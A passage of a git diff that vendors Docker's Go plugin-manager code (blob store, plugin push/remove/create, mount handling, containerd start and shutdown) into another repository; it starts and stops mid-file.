uploadManager := xfer.NewLayerUploadManager(3) + + imagePushConfig := &distribution.ImagePushConfig{ + Config: distribution.Config{ + MetaHeaders: metaHeader, + AuthConfig: authConfig, + ProgressOutput: po, + RegistryService: pm.config.RegistryService, + ReferenceStore: rs, + ImageEventLogger: pm.config.LogPluginEvent, + ImageStore: is, + RequireSchema2: true, + }, + ConfigMediaType: schema2.MediaTypePluginConfig, + LayerStore: ls, + UploadManager: uploadManager, + } + + return distribution.Push(ctx, ref, imagePushConfig) +} + +type pluginReference struct { + name reference.Named + pluginID digest.Digest +} + +func (r *pluginReference) References(id digest.Digest) []reference.Named { + if r.pluginID != id { + return nil + } + return []reference.Named{r.name} +} + +func (r *pluginReference) ReferencesByName(ref reference.Named) []reference.Association { + return []reference.Association{ + { + Ref: r.name, + ID: r.pluginID, + }, + } +} + +func (r *pluginReference) Get(ref reference.Named) (digest.Digest, error) { + if r.name.String() != ref.String() { + return digest.Digest(""), reference.ErrDoesNotExist + } + return r.pluginID, nil +} + +func (r *pluginReference) AddTag(ref reference.Named, id digest.Digest, force bool) error { + // Read only, ignore + return nil +} +func (r *pluginReference) AddDigest(ref reference.Canonical, id digest.Digest, force bool) error { + // Read only, ignore + return nil +} +func (r *pluginReference) Delete(ref reference.Named) (bool, error) { + // Read only, ignore + return false, nil +} + +type pluginConfigStore struct { + pm *Manager + plugin *v2.Plugin +} + +func (s *pluginConfigStore) Put([]byte) (digest.Digest, error) { + return digest.Digest(""), errors.New("cannot store config on push") +} + +func (s *pluginConfigStore) Get(d digest.Digest) ([]byte, error) { + if s.plugin.Config != d { + return nil, errors.New("plugin not found") + } + rwc, err := s.pm.blobStore.Get(d) + if err != nil { + return nil, err + } + defer rwc.Close() + return ioutil.ReadAll(rwc) +} + +func (s *pluginConfigStore) RootFSFromConfig(c []byte) (*image.RootFS, error) { + return configToRootFS(c) +} + +type pluginLayerProvider struct { + pm *Manager + plugin *v2.Plugin +} + +func (p *pluginLayerProvider) Get(id layer.ChainID) (distribution.PushLayer, error) { + rootFS := rootFSFromPlugin(p.plugin.PluginObj.Config.Rootfs) + var i int + for i = 1; i <= len(rootFS.DiffIDs); i++ { + if layer.CreateChainID(rootFS.DiffIDs[:i]) == id { + break + } + } + if i > len(rootFS.DiffIDs) { + return nil, errors.New("layer not found") + } + return &pluginLayer{ + pm: p.pm, + diffIDs: rootFS.DiffIDs[:i], + blobs: p.plugin.Blobsums[:i], + }, nil +} + +type pluginLayer struct { + pm *Manager + diffIDs []layer.DiffID + blobs []digest.Digest +} + +func (l *pluginLayer) ChainID() layer.ChainID { + return layer.CreateChainID(l.diffIDs) +} + +func (l *pluginLayer) DiffID() layer.DiffID { + return l.diffIDs[len(l.diffIDs)-1] +} + +func (l *pluginLayer) Parent() distribution.PushLayer { + if len(l.diffIDs) == 1 { + return nil + } + return &pluginLayer{ + pm: l.pm, + diffIDs: l.diffIDs[:len(l.diffIDs)-1], + blobs: l.blobs[:len(l.diffIDs)-1], + } +} + +func (l *pluginLayer) Open() (io.ReadCloser, error) { + return l.pm.blobStore.Get(l.blobs[len(l.diffIDs)-1]) +} + +func (l *pluginLayer) Size() (int64, error) { + return l.pm.blobStore.Size(l.blobs[len(l.diffIDs)-1]) +} + +func (l *pluginLayer) MediaType() string { + return schema2.MediaTypeLayer +} + +func (l *pluginLayer) Release() { + // Nothing needs to be release, no references held +} + +// Remove deletes plugin's root directory. +func (pm *Manager) Remove(name string, config *types.PluginRmConfig) error { + p, err := pm.config.Store.GetV2Plugin(name) + pm.mu.RLock() + c := pm.cMap[p] + pm.mu.RUnlock() + + if err != nil { + return err + } + + if !config.ForceRemove { + if p.GetRefCount() > 0 { + return fmt.Errorf("plugin %s is in use", p.Name()) + } + if p.IsEnabled() { + return fmt.Errorf("plugin %s is enabled", p.Name()) + } + } + + if p.IsEnabled() { + if err := pm.disable(p, c); err != nil { + logrus.Errorf("failed to disable plugin '%s': %s", p.Name(), err) + } + } + + defer func() { + go pm.GC() + }() + + id := p.GetID() + pm.config.Store.Remove(p) + pluginDir := filepath.Join(pm.config.Root, id) + if err := recursiveUnmount(pm.config.Root); err != nil { + logrus.WithField("dir", pm.config.Root).WithField("id", id).Warn(err) + } + if err := os.RemoveAll(pluginDir); err != nil { + logrus.Warnf("unable to remove %q from plugin remove: %v", pluginDir, err) + } + pm.config.LogPluginEvent(id, name, "remove") + return nil +} + +func getMounts(root string) ([]string, error) { + infos, err := mount.GetMounts() + if err != nil { + return nil, errors.Wrap(err, "failed to read mount table while performing recursive unmount") + } + + var mounts []string + for _, m := range infos { + if strings.HasPrefix(m.Mountpoint, root) { + mounts = append(mounts, m.Mountpoint) + } + } + + return mounts, nil +} + +func recursiveUnmount(root string) error { + mounts, err := getMounts(root) + if err != nil { + return err + } + + // sort in reverse-lexicographic order so the root mount will always be last + sort.Sort(sort.Reverse(sort.StringSlice(mounts))) + + for i, m := range mounts { + if err := mount.Unmount(m); err != nil { + if i == len(mounts)-1 { + return errors.Wrapf(err, "error performing recursive unmount on %s", root) + } + logrus.WithError(err).WithField("mountpoint", m).Warn("could not unmount") + } + } + + return nil +} + +// Set sets plugin args +func (pm *Manager) Set(name string, args []string) error { + p, err := pm.config.Store.GetV2Plugin(name) + if err != nil { + return err + } + if err := p.Set(args); err != nil { + return err + } + return pm.save(p) +} + +// CreateFromContext creates a plugin from the given pluginDir which contains +// both the rootfs and the config.json and a repoName with optional tag. +func (pm *Manager) CreateFromContext(ctx context.Context, tarCtx io.ReadCloser, options *types.PluginCreateOptions) (err error) { + pm.muGC.RLock() + defer pm.muGC.RUnlock() + + ref, err := reference.ParseNamed(options.RepoName) + if err != nil { + return errors.Wrapf(err, "failed to parse reference %v", options.RepoName) + } + if _, ok := ref.(reference.Canonical); ok { + return errors.Errorf("canonical references are not permitted") + } + taggedRef := reference.WithDefaultTag(ref) + name := taggedRef.String() + + if err := pm.config.Store.validateName(name); err != nil { // fast check, real check is in createPlugin() + return err + } + + tmpRootFSDir, err := ioutil.TempDir(pm.tmpDir(), ".rootfs") + defer os.RemoveAll(tmpRootFSDir) + if err != nil { + return errors.Wrap(err, "failed to create temp directory") + } + var configJSON []byte + rootFS := splitConfigRootFSFromTar(tarCtx, &configJSON) + + rootFSBlob, err := pm.blobStore.New() + if err != nil { + return err + } + defer rootFSBlob.Close() + gzw := gzip.NewWriter(rootFSBlob) + layerDigester := digest.Canonical.New() + rootFSReader := io.TeeReader(rootFS, io.MultiWriter(gzw, layerDigester.Hash())) + + if err := chrootarchive.Untar(rootFSReader, tmpRootFSDir, nil); err != nil { + return err + } + if err := rootFS.Close(); err != nil { + return err + } + + if configJSON == nil { + return errors.New("config not found") + } + + if err := gzw.Close(); err != nil { + return errors.Wrap(err, "error closing gzip writer") + } + + var config types.PluginConfig + if err := json.Unmarshal(configJSON, &config); err != nil { + return errors.Wrap(err, "failed to parse config") + } + + if err := pm.validateConfig(config); err != nil { + return err + } + + pm.mu.Lock() + defer pm.mu.Unlock() + + rootFSBlobsum, err := rootFSBlob.Commit() + if err != nil { + return err + } + defer func() { + if err != nil { + go pm.GC() + } + }() + + config.Rootfs = &types.PluginConfigRootfs{ + Type: "layers", + DiffIds: []string{layerDigester.Digest().String()}, + } + + configBlob, err := pm.blobStore.New() + if err != nil { + return err + } + defer configBlob.Close() + if err := json.NewEncoder(configBlob).Encode(config); err != nil { + return errors.Wrap(err, "error encoding json config") + } + configBlobsum, err := configBlob.Commit() + if err != nil { + return err + } + + p, err := pm.createPlugin(name, configBlobsum, []digest.Digest{rootFSBlobsum}, tmpRootFSDir, nil) + if err != nil { + return err + } + p.PluginObj.PluginReference = taggedRef.String() + + pm.config.LogPluginEvent(p.PluginObj.ID, name, "create") + + return nil +} + +func (pm *Manager) validateConfig(config types.PluginConfig) error { + return nil // TODO: +} + +func splitConfigRootFSFromTar(in io.ReadCloser, config *[]byte) io.ReadCloser { + pr, pw := io.Pipe() + go func() { + tarReader := tar.NewReader(in) + tarWriter := tar.NewWriter(pw) + defer in.Close() + + hasRootFS := false + + for { + hdr, err := tarReader.Next() + if err == io.EOF { + if !hasRootFS { + pw.CloseWithError(errors.Wrap(err, "no rootfs found")) + return + } + // Signals end of archive. + tarWriter.Close() + pw.Close() + return + } + if err != nil { + pw.CloseWithError(errors.Wrap(err, "failed to read from tar")) + return + } + + content := io.Reader(tarReader) + name := path.Clean(hdr.Name) + if path.IsAbs(name) { + name = name[1:] + } + if name == configFileName { + dt, err := ioutil.ReadAll(content) + if err != nil { + pw.CloseWithError(errors.Wrapf(err, "failed to read %s", configFileName)) + return + } + *config = dt + } + if parts := strings.Split(name, "/"); len(parts) != 0 && parts[0] == rootFSFileName { + hdr.Name = path.Clean(path.Join(parts[1:]...)) + if hdr.Typeflag == tar.TypeLink && strings.HasPrefix(strings.ToLower(hdr.Linkname), rootFSFileName+"/") { + hdr.Linkname = hdr.Linkname[len(rootFSFileName)+1:] + } + if err := tarWriter.WriteHeader(hdr); err != nil { + pw.CloseWithError(errors.Wrap(err, "error writing tar header")) + return + } + if _, err := pools.Copy(tarWriter, content); err != nil { + pw.CloseWithError(errors.Wrap(err, "error copying tar data")) + return + } + hasRootFS = true + } else { + io.Copy(ioutil.Discard, content) + } + } + }() + return pr +} diff --git a/vendor/github.com/docker/docker/plugin/backend_unsupported.go b/vendor/github.com/docker/docker/plugin/backend_unsupported.go new file mode 100644 index 0000000000..66e6dab9e8 --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/backend_unsupported.go @@ -0,0 +1,71 @@ +// +build !linux + +package plugin + +import ( + "errors" + "io" + "net/http" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/reference" + "golang.org/x/net/context" +) + +var errNotSupported = errors.New("plugins are not supported on this platform") + +// Disable deactivates a plugin, which implies that they cannot be used by containers. +func (pm *Manager) Disable(name string, config *types.PluginDisableConfig) error { + return errNotSupported +} + +// Enable activates a plugin, which implies that they are ready to be used by containers. +func (pm *Manager) Enable(name string, config *types.PluginEnableConfig) error { + return errNotSupported +} + +// Inspect examines a plugin config +func (pm *Manager) Inspect(refOrID string) (tp *types.Plugin, err error) { + return nil, errNotSupported +} + +// Privileges pulls a plugin config and computes the privileges required to install it. +func (pm *Manager) Privileges(ctx context.Context, ref reference.Named, metaHeader http.Header, authConfig *types.AuthConfig) (types.PluginPrivileges, error) { + return nil, errNotSupported +} + +// Pull pulls a plugin, check if the correct privileges are provided and install the plugin. +func (pm *Manager) Pull(ctx context.Context, ref reference.Named, name string, metaHeader http.Header, authConfig *types.AuthConfig, privileges types.PluginPrivileges, out io.Writer) error { + return errNotSupported +} + +// Upgrade pulls a plugin, check if the correct privileges are provided and install the plugin. +func (pm *Manager) Upgrade(ctx context.Context, ref reference.Named, name string, metaHeader http.Header, authConfig *types.AuthConfig, privileges types.PluginPrivileges, outStream io.Writer) error { + return errNotSupported +} + +// List displays the list of plugins and associated metadata. +func (pm *Manager) List() ([]types.Plugin, error) { + return nil, errNotSupported +} + +// Push pushes a plugin to the store. +func (pm *Manager) Push(ctx context.Context, name string, metaHeader http.Header, authConfig *types.AuthConfig, out io.Writer) error { + return errNotSupported +} + +// Remove deletes plugin's root directory. +func (pm *Manager) Remove(name string, config *types.PluginRmConfig) error { + return errNotSupported +} + +// Set sets plugin args +func (pm *Manager) Set(name string, args []string) error { + return errNotSupported +} + +// CreateFromContext creates a plugin from the given pluginDir which contains +// both the rootfs and the config.json and a repoName with optional tag. +func (pm *Manager) CreateFromContext(ctx context.Context, tarCtx io.ReadCloser, options *types.PluginCreateOptions) error { + return errNotSupported +} diff --git a/vendor/github.com/docker/docker/plugin/blobstore.go b/vendor/github.com/docker/docker/plugin/blobstore.go new file mode 100644 index 0000000000..dc9e598e04 --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/blobstore.go @@ -0,0 +1,181 @@ +package plugin + +import ( + "io" + "io/ioutil" + "os" + "path/filepath" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/digest" + "github.com/docker/docker/distribution/xfer" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/progress" + "github.com/pkg/errors" + "golang.org/x/net/context" +) + +type blobstore interface { + New() (WriteCommitCloser, error) + Get(dgst digest.Digest) (io.ReadCloser, error) + Size(dgst digest.Digest) (int64, error) +} + +type basicBlobStore struct { + path string +} + +func newBasicBlobStore(p string) (*basicBlobStore, error) { + tmpdir := filepath.Join(p, "tmp") + if err := os.MkdirAll(tmpdir, 0700); err != nil { + return nil, errors.Wrapf(err, "failed to mkdir %v", p) + } + return &basicBlobStore{path: p}, nil +} + +func (b *basicBlobStore) New() (WriteCommitCloser, error) { + f, err := ioutil.TempFile(filepath.Join(b.path, "tmp"), ".insertion") + if err != nil { + return nil, errors.Wrap(err, "failed to create temp file") + } + return newInsertion(f), nil +} + +func (b *basicBlobStore) Get(dgst digest.Digest) (io.ReadCloser, error) { + return os.Open(filepath.Join(b.path, string(dgst.Algorithm()), dgst.Hex())) +} + +func (b *basicBlobStore) Size(dgst digest.Digest) (int64, error) { + stat, err := os.Stat(filepath.Join(b.path, string(dgst.Algorithm()), dgst.Hex())) + if err != nil { + return 0, err + } + return stat.Size(), nil +} + +func (b *basicBlobStore) gc(whitelist map[digest.Digest]struct{}) { + for _, alg := range []string{string(digest.Canonical)} { + items, err := ioutil.ReadDir(filepath.Join(b.path, alg)) + if err != nil { + continue + } + for _, fi := range items { + if _, exists := whitelist[digest.Digest(alg+":"+fi.Name())]; !exists { + p := filepath.Join(b.path, alg, fi.Name()) + err := os.RemoveAll(p) + logrus.Debugf("cleaned up blob %v: %v", p, err) + } + } + } + +} + +// WriteCommitCloser defines object that can be committed to blobstore. +type WriteCommitCloser interface { + io.WriteCloser + Commit() (digest.Digest, error) +} + +type insertion struct { + io.Writer + f *os.File + digester digest.Digester + closed bool +} + +func newInsertion(tempFile *os.File) *insertion { + digester := digest.Canonical.New() + return &insertion{f: tempFile, digester: digester, Writer: io.MultiWriter(tempFile, digester.Hash())} +} + +func (i *insertion) Commit() (digest.Digest, error) { + p := i.f.Name() + d := filepath.Join(filepath.Join(p, "../../")) + i.f.Sync() + defer os.RemoveAll(p) + if err := i.f.Close(); err != nil { + return "", err + } + i.closed = true + dgst := i.digester.Digest() + if err := os.MkdirAll(filepath.Join(d, string(dgst.Algorithm())), 0700); err != nil { + return "", errors.Wrapf(err, "failed to mkdir %v", d) + } + if err := os.Rename(p, filepath.Join(d, string(dgst.Algorithm()), dgst.Hex())); err != nil { + return "", errors.Wrapf(err, "failed to rename %v", p) + } + return dgst, nil +} + +func (i *insertion) Close() error { + if i.closed { + return nil + } + defer os.RemoveAll(i.f.Name()) + return i.f.Close() +} + +type downloadManager struct { + blobStore blobstore + tmpDir string + blobs []digest.Digest + configDigest digest.Digest +} + +func (dm *downloadManager) Download(ctx context.Context, initialRootFS image.RootFS, layers []xfer.DownloadDescriptor, progressOutput progress.Output) (image.RootFS, func(), error) { + for _, l := range layers { + b, err := dm.blobStore.New() + if err != nil { + return initialRootFS, nil, err + } + defer b.Close() + rc, _, err := l.Download(ctx, progressOutput) + if err != nil { + return initialRootFS, nil, errors.Wrap(err, "failed to download") + } + defer rc.Close() + r := io.TeeReader(rc, b) + inflatedLayerData, err := archive.DecompressStream(r) + if err != nil { + return initialRootFS, nil, err + } + digester := digest.Canonical.New() + if _, err := archive.ApplyLayer(dm.tmpDir, io.TeeReader(inflatedLayerData, digester.Hash())); err != nil { + return initialRootFS, nil, err + } + initialRootFS.Append(layer.DiffID(digester.Digest())) + d, err := b.Commit() + if err != nil { + return initialRootFS, nil, err + } + dm.blobs = append(dm.blobs, d) + } + return initialRootFS, nil, nil +} + +func (dm *downloadManager) Put(dt []byte) (digest.Digest, error) { + b, err := dm.blobStore.New() + if err != nil { + return "", err + } + defer b.Close() + n, err := b.Write(dt) + if err != nil { + return "", err + } + if n != len(dt) { + return "", io.ErrShortWrite + } + d, err := b.Commit() + dm.configDigest = d + return d, err +} + +func (dm *downloadManager) Get(d digest.Digest) ([]byte, error) { + return nil, digest.ErrDigestNotFound +} +func (dm *downloadManager) RootFSFromConfig(c []byte) (*image.RootFS, error) { + return configToRootFS(c) +} diff --git a/vendor/github.com/docker/docker/plugin/defs.go b/vendor/github.com/docker/docker/plugin/defs.go new file mode 100644 index 0000000000..927f639166 --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/defs.go @@ -0,0 +1,26 @@ +package plugin + +import ( + "sync" + + "github.com/docker/docker/pkg/plugins" + "github.com/docker/docker/plugin/v2" +) + +// Store manages the plugin inventory in memory and on-disk +type Store struct { + sync.RWMutex + plugins map[string]*v2.Plugin + /* handlers are necessary for transition path of legacy plugins + * to the new model. Legacy plugins use Handle() for registering an + * activation callback.*/ + handlers map[string][]func(string, *plugins.Client) +} + +// NewStore creates a Store. +func NewStore(libRoot string) *Store { + return &Store{ + plugins: make(map[string]*v2.Plugin), + handlers: make(map[string][]func(string, *plugins.Client)), + } +} diff --git a/vendor/github.com/docker/docker/plugin/manager.go b/vendor/github.com/docker/docker/plugin/manager.go new file mode 100644 index 0000000000..f260aa61a7 --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/manager.go @@ -0,0 +1,347 @@ +package plugin + +import ( + "encoding/json" + "io" + "io/ioutil" + "os" + "path/filepath" + "reflect" + "regexp" + "strings" + "sync" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/digest" + "github.com/docker/docker/api/types" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/docker/docker/libcontainerd" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/mount" + "github.com/docker/docker/plugin/v2" + "github.com/docker/docker/reference" + "github.com/docker/docker/registry" + "github.com/pkg/errors" +) + +const configFileName = "config.json" +const rootFSFileName = "rootfs" + +var validFullID = regexp.MustCompile(`^([a-f0-9]{64})$`) + +func (pm *Manager) restorePlugin(p *v2.Plugin) error { + if p.IsEnabled() { + return pm.restore(p) + } + return nil +} + +type eventLogger func(id, name, action string) + +// ManagerConfig defines configuration needed to start new manager. +type ManagerConfig struct { + Store *Store // remove + Executor libcontainerd.Remote + RegistryService registry.Service + LiveRestoreEnabled bool // TODO: remove + LogPluginEvent eventLogger + Root string + ExecRoot string +} + +// Manager controls the plugin subsystem. +type Manager struct { + config ManagerConfig + mu sync.RWMutex // protects cMap + muGC sync.RWMutex // protects blobstore deletions + cMap map[*v2.Plugin]*controller + containerdClient libcontainerd.Client + blobStore *basicBlobStore +} + +// controller represents the manager's control on a plugin. +type controller struct { + restart bool + exitChan chan bool + timeoutInSecs int +} + +// pluginRegistryService ensures that all resolved repositories +// are of the plugin class. +type pluginRegistryService struct { + registry.Service +} + +func (s pluginRegistryService) ResolveRepository(name reference.Named) (repoInfo *registry.RepositoryInfo, err error) { + repoInfo, err = s.Service.ResolveRepository(name) + if repoInfo != nil { + repoInfo.Class = "plugin" + } + return +} + +// NewManager returns a new plugin manager. +func NewManager(config ManagerConfig) (*Manager, error) { + if config.RegistryService != nil { + config.RegistryService = pluginRegistryService{config.RegistryService} + } + manager := &Manager{ + config: config, + } + if err := os.MkdirAll(manager.config.Root, 0700); err != nil { + return nil, errors.Wrapf(err, "failed to mkdir %v", manager.config.Root) + } + if err := os.MkdirAll(manager.config.ExecRoot, 0700); err != nil { + return nil, errors.Wrapf(err, "failed to mkdir %v", manager.config.ExecRoot) + } + if err := os.MkdirAll(manager.tmpDir(), 0700); err != nil { + return nil, errors.Wrapf(err, "failed to mkdir %v", manager.tmpDir()) + } + var err error + manager.containerdClient, err = config.Executor.Client(manager) // todo: move to another struct + if err != nil { + return nil, errors.Wrap(err, "failed to create containerd client") + } + manager.blobStore, err = newBasicBlobStore(filepath.Join(manager.config.Root, "storage/blobs")) + if err != nil { + return nil, err + } + + manager.cMap = make(map[*v2.Plugin]*controller) + if err := manager.reload(); err != nil { + return nil, errors.Wrap(err, "failed to restore plugins") + } + return manager, nil +} + +func (pm *Manager) tmpDir() string { + return filepath.Join(pm.config.Root, "tmp") +} + +// StateChanged updates plugin internals using libcontainerd events. +func (pm *Manager) StateChanged(id string, e libcontainerd.StateInfo) error { + logrus.Debugf("plugin state changed %s %#v", id, e) + + switch e.State { + case libcontainerd.StateExit: + p, err := pm.config.Store.GetV2Plugin(id) + if err != nil { + return err + } + + pm.mu.RLock() + c := pm.cMap[p] + + if c.exitChan != nil { + close(c.exitChan) + } + restart := c.restart + pm.mu.RUnlock() + + os.RemoveAll(filepath.Join(pm.config.ExecRoot, id)) + + if p.PropagatedMount != "" { + if err := mount.Unmount(p.PropagatedMount); err != nil { + logrus.Warnf("Could not unmount %s: %v", p.PropagatedMount, err) + } + propRoot := filepath.Join(filepath.Dir(p.Rootfs), "propagated-mount") + if err := mount.Unmount(propRoot); err != nil { + logrus.Warn("Could not unmount %s: %v", propRoot, err) + } + } + + if restart { + pm.enable(p, c, true) + } + } + + return nil +} + +func (pm *Manager) reload() error { // todo: restore + dir, err := ioutil.ReadDir(pm.config.Root) + if err != nil { + return errors.Wrapf(err, "failed to read %v", pm.config.Root) + } + plugins := make(map[string]*v2.Plugin) + for _, v := range dir { + if validFullID.MatchString(v.Name()) { + p, err := pm.loadPlugin(v.Name()) + if err != nil { + return err + } + plugins[p.GetID()] = p + } + } + + pm.config.Store.SetAll(plugins) + + var wg sync.WaitGroup + wg.Add(len(plugins)) + for _, p := range plugins { + c := &controller{} // todo: remove this + pm.cMap[p] = c + go func(p *v2.Plugin) { + defer wg.Done() + if err := pm.restorePlugin(p); err != nil { + logrus.Errorf("failed to restore plugin '%s': %s", p.Name(), err) + return + } + + if p.Rootfs != "" { + p.Rootfs = filepath.Join(pm.config.Root, p.PluginObj.ID, "rootfs") + } + + // We should only enable rootfs propagation for certain plugin types that need it. + for _, typ := range p.PluginObj.Config.Interface.Types { + if (typ.Capability == "volumedriver" || typ.Capability == "graphdriver") && typ.Prefix == "docker" && strings.HasPrefix(typ.Version, "1.") { + if p.PluginObj.Config.PropagatedMount != "" { + propRoot := filepath.Join(filepath.Dir(p.Rootfs), "propagated-mount") + + // check if we need to migrate an older propagated mount from before + // these mounts were stored outside the plugin rootfs + if _, err := os.Stat(propRoot); os.IsNotExist(err) { + if _, err := os.Stat(p.PropagatedMount); err == nil { + // make sure nothing is mounted here + // don't care about errors + mount.Unmount(p.PropagatedMount) + if err := os.Rename(p.PropagatedMount, propRoot); err != nil { + logrus.WithError(err).WithField("dir", propRoot).Error("error migrating propagated mount storage") + } + if err := os.MkdirAll(p.PropagatedMount, 0755); err != nil { + logrus.WithError(err).WithField("dir", p.PropagatedMount).Error("error migrating propagated mount storage") + } + } + } + + if err := os.MkdirAll(propRoot, 0755); err != nil { + logrus.Errorf("failed to create PropagatedMount directory at %s: %v", propRoot, err) + } + // TODO: sanitize PropagatedMount and prevent breakout + p.PropagatedMount = filepath.Join(p.Rootfs, p.PluginObj.Config.PropagatedMount) + if err := os.MkdirAll(p.PropagatedMount, 0755); err != nil { + logrus.Errorf("failed to create PropagatedMount directory at %s: %v", p.PropagatedMount, err) + return + } + } + } + } + + pm.save(p) + requiresManualRestore := !pm.config.LiveRestoreEnabled && p.IsEnabled() + + if requiresManualRestore { + // if liveRestore is not enabled, the plugin will be stopped now so we should enable it + if err := pm.enable(p, c, true); err != nil { + logrus.Errorf("failed to enable plugin '%s': %s", p.Name(), err) + } + } + }(p) + } + wg.Wait() + return nil +} + +func (pm *Manager) loadPlugin(id string) (*v2.Plugin, error) { + p := filepath.Join(pm.config.Root, id, configFileName) + dt, err := ioutil.ReadFile(p) + if err != nil { + return nil, errors.Wrapf(err, "error reading %v", p) + } + var plugin v2.Plugin + if err := json.Unmarshal(dt, &plugin); err != nil { + return nil, errors.Wrapf(err, "error decoding %v", p) + } + return &plugin, nil +} + +func (pm *Manager) save(p *v2.Plugin) error { + pluginJSON, err := json.Marshal(p) + if err != nil { + return errors.Wrap(err, "failed to marshal plugin json") + } + if err := ioutils.AtomicWriteFile(filepath.Join(pm.config.Root, p.GetID(), configFileName), pluginJSON, 0600); err != nil { + return errors.Wrap(err, "failed to write atomically plugin json") + } + return nil +} + +// GC cleans up unrefrenced blobs. This is recommended to run in a goroutine +func (pm *Manager) GC() { + pm.muGC.Lock() + defer pm.muGC.Unlock() + + whitelist := make(map[digest.Digest]struct{}) + for _, p := range pm.config.Store.GetAll() { + whitelist[p.Config] = struct{}{} + for _, b := range p.Blobsums { + whitelist[b] = struct{}{} + } + } + + pm.blobStore.gc(whitelist) +} + +type logHook struct{ id string } + +func (logHook) Levels() []logrus.Level { + return logrus.AllLevels +} + +func (l logHook) Fire(entry *logrus.Entry) error { + entry.Data = logrus.Fields{"plugin": l.id} + return nil +} + +func attachToLog(id string) func(libcontainerd.IOPipe) error { + return func(iop libcontainerd.IOPipe) error { + iop.Stdin.Close() + + logger := logrus.New() + logger.Hooks.Add(logHook{id}) + // TODO: cache writer per id + w := logger.Writer() + go func() { + io.Copy(w, iop.Stdout) + }() + go func() { + // TODO: update logrus and use logger.WriterLevel + io.Copy(w, iop.Stderr) + }() + return nil + } +} + +func validatePrivileges(requiredPrivileges, privileges types.PluginPrivileges) error { + // todo: make a better function that doesn't check order + if !reflect.DeepEqual(privileges, requiredPrivileges) { + return errors.New("incorrect privileges") + } + return nil +} + +func configToRootFS(c []byte) (*image.RootFS, error) { + var pluginConfig types.PluginConfig + if err := json.Unmarshal(c, &pluginConfig); err != nil { + return nil, err + } + // validation for empty rootfs is in distribution code + if pluginConfig.Rootfs == nil { + return nil, nil + } + + return rootFSFromPlugin(pluginConfig.Rootfs), nil +} + +func rootFSFromPlugin(pluginfs *types.PluginConfigRootfs) *image.RootFS { + rootFS := image.RootFS{ + Type: pluginfs.Type, + DiffIDs: make([]layer.DiffID, len(pluginfs.DiffIds)), + } + for i := range pluginfs.DiffIds { + rootFS.DiffIDs[i] = layer.DiffID(pluginfs.DiffIds[i]) + } + + return &rootFS +} diff --git a/vendor/github.com/docker/docker/plugin/manager_linux.go b/vendor/github.com/docker/docker/plugin/manager_linux.go new file mode 100644 index 0000000000..ad66616628 --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/manager_linux.go @@ -0,0 +1,284 @@ +// +build linux + +package plugin + +import ( + "encoding/json" + "fmt" + "os" + "path/filepath" + "syscall" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/digest" + "github.com/docker/docker/api/types" + "github.com/docker/docker/daemon/initlayer" + "github.com/docker/docker/libcontainerd" + "github.com/docker/docker/pkg/mount" + "github.com/docker/docker/pkg/plugins" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/plugin/v2" + specs "github.com/opencontainers/runtime-spec/specs-go" + "github.com/pkg/errors" +) + +func (pm *Manager) enable(p *v2.Plugin, c *controller, force bool) error { + p.Rootfs = filepath.Join(pm.config.Root, p.PluginObj.ID, "rootfs") + if p.IsEnabled() && !force { + return fmt.Errorf("plugin %s is already enabled", p.Name()) + } + spec, err := p.InitSpec(pm.config.ExecRoot) + if err != nil { + return err + } + + c.restart = true + c.exitChan = make(chan bool) + + pm.mu.Lock() + pm.cMap[p] = c + pm.mu.Unlock() + + var propRoot string + if p.PropagatedMount != "" { + propRoot = filepath.Join(filepath.Dir(p.Rootfs), "propagated-mount") + + if err := os.MkdirAll(propRoot, 0755); err != nil { + logrus.Errorf("failed to create PropagatedMount directory at %s: %v", propRoot, err) + } + + if err := mount.MakeRShared(propRoot); err != nil { + return errors.Wrap(err, "error setting up propagated mount dir") + } + + if err := mount.Mount(propRoot, p.PropagatedMount, "none", "rbind"); err != nil { + return errors.Wrap(err, "error creating mount for propagated mount") + } + } + + if err := initlayer.Setup(filepath.Join(pm.config.Root, p.PluginObj.ID, rootFSFileName), 0, 0); err != nil { + return errors.WithStack(err) + } + + if err := pm.containerdClient.Create(p.GetID(), "", "", specs.Spec(*spec), attachToLog(p.GetID())); err != nil { + if p.PropagatedMount != "" { + if err := mount.Unmount(p.PropagatedMount); err != nil { + logrus.Warnf("Could not unmount %s: %v", p.PropagatedMount, err) + } + if err := mount.Unmount(propRoot); err != nil { + logrus.Warnf("Could not unmount %s: %v", propRoot, err) + } + } + return errors.WithStack(err) + } + + return pm.pluginPostStart(p, c) +} + +func (pm *Manager) pluginPostStart(p *v2.Plugin, c *controller) error { + client, err := plugins.NewClientWithTimeout("unix://"+filepath.Join(pm.config.ExecRoot, p.GetID(), p.GetSocket()), nil, c.timeoutInSecs) + if err != nil { + c.restart = false + shutdownPlugin(p, c, pm.containerdClient) + return errors.WithStack(err) + } + + p.SetPClient(client) + pm.config.Store.SetState(p, true) + pm.config.Store.CallHandler(p) + + return pm.save(p) +} + +func (pm *Manager) restore(p *v2.Plugin) error { + if err := pm.containerdClient.Restore(p.GetID(), attachToLog(p.GetID())); err != nil { + return err + } + + if pm.config.LiveRestoreEnabled { + c := &controller{} + if pids, _ := pm.containerdClient.GetPidsForContainer(p.GetID()); len(pids) == 0 { + // plugin is not running, so follow normal startup procedure + return pm.enable(p, c, true) + } + + c.exitChan = make(chan bool) + c.restart = true + pm.mu.Lock() + pm.cMap[p] = c + pm.mu.Unlock() + return pm.pluginPostStart(p, c) + } + + return nil +} + +func shutdownPlugin(p *v2.Plugin, c *controller, containerdClient libcontainerd.Client) { + pluginID := p.GetID() + + err := containerdClient.Signal(pluginID, int(syscall.SIGTERM)) + if err != nil { + logrus.Errorf("Sending SIGTERM to plugin failed with error: %v", err) + } else { + select { + case <-c.exitChan: + logrus.Debug("Clean shutdown of plugin") + case <-time.After(time.Second * 10): + logrus.Debug("Force shutdown plugin") + if err := containerdClient.Signal(pluginID, int(syscall.SIGKILL)); err != nil 